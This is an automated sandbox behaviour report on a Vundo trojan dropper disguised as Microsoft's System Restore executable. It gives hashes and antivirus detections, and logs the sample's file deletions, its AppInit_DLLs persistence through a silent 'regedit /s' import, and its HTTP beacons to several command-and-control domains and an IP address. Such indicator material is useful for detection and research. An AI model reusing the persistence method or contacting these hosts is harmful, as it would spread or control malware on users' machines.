Analysis Date: 2013-09-18 00:12:16
MD5: 14acf25cdb0222209b2c2f954203c384
SHA1: ca6b9f60978f366b906fd748c97261fa0d2bc93d

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 2150369aed42ac9596edae4ed3a11934 sha1: d8f8448373188ba5499679eaea7d400dd23e4286 size: 91648
Section _ASM2 md5: 2d399b252d798ff86965fc5dd932b0ce sha1: d9c34739876fb6684fbda97ee54c36e55ccc95fe size: 63488
Section .rdata md5: 80759194640cd0c281898748a3c7253b sha1: dcb925370efdab1968bdce434442f7fbd7245c68 size: 8192
Section .data md5: 8f29192ca6d1ddb0cef33d944900a551 sha1: 7329a34683cd90848c18c960c4abc8cecfc34a33 size: 5120
Section .tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section .rsrc md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304
Timestamp: 2012-09-25 04:20:52
Version:
  LegalCopyright: © Корпорация Майкрософт. Все права защищены.
  InternalName: RSTRUI.EXE
  FileVersion: 5.1.2600.5512 (xpsp.080413-2108)
  CompanyName: Корпорация Майкрософт
  ProductName: Операционная система Microsoft® Windows®
  ProductVersion: 5.1.2600.5512
  FileDescription: Приложение восстановления системы
  OriginalFilename: RSTRUI.EXE
Packer: Microsoft Visual C++ ?.?
PEhash: b346d8973479d0079c4245f4806f7f3d8c4e1956
AV avg: Generic_r.BGN
AV avira: TR/Vundo.Gen7
AV msse: TrojanDropper:Win32/Vundo.V

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum\Implementing ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache\AdminPinStartTime ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-000000000046}\Enum\Implementing ➝ NULL
Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\SysTray\Services ➝ 31
Creates File: C:\WINDOWS\system32\ujhbixa.dll
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process:
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ Pid 528

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\ujhbixa.dll\\x00

Network Details:

HTTP GET: http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2006&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/8fYJKHPozjbfIOiWMLHxonhJ6hLkPf1JJA9b6cfiW8
User-Agent:
HTTP GET: http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2006&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/8fYJKHPozjbfIOiWMLHxonhJ6hLkPf1DzBKmUpbj7Q
User-Agent:
HTTP GET: http://tegimode.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2006&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/8fYJKHPozjbfIOiWMLHxonhJ6hLkPf1MEoAcex27Z3
User-Agent:
HTTP GET: http://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2006&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/8fYJKHPozjbfIOiWMLHxonhJ6hLkPf1NaKkoAF69Wt
User-Agent:
HTTP GET: http://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2006&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/8fYJKHPozjbfIOiWMLHxonhJ6hLkPf1GxW+tI6Rxxj
User-Agent:
HTTP GET: http://nshouse1.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2006&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/8fYJKHPozjbfIOiWMLHxonhJ6hLkPf1BOzHyjlft95
User-Agent:
HTTP GET: http://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2006&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/8fYJKHPozjbfIOiWMLHxonhJ6hLkPf1MMf55iwxyWD
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 62.116.143.17:80
Flows TCP: 192.168.1.1:1032 ➝ 62.116.143.17:80
Flows TCP: 192.168.1.1:1033 ➝ 190.93.245.20:80
Flows TCP: 192.168.1.1:1034 ➝ 190.93.245.20:80
Flows TCP: 192.168.1.1:1035 ➝ 208.73.211.230:80
Flows TCP: 192.168.1.1:1036 ➝ 208.73.211.230:80
Flows TCP: 192.168.1.1:1037 ➝ 91.220.35.154:80

Raw Pcap

Strings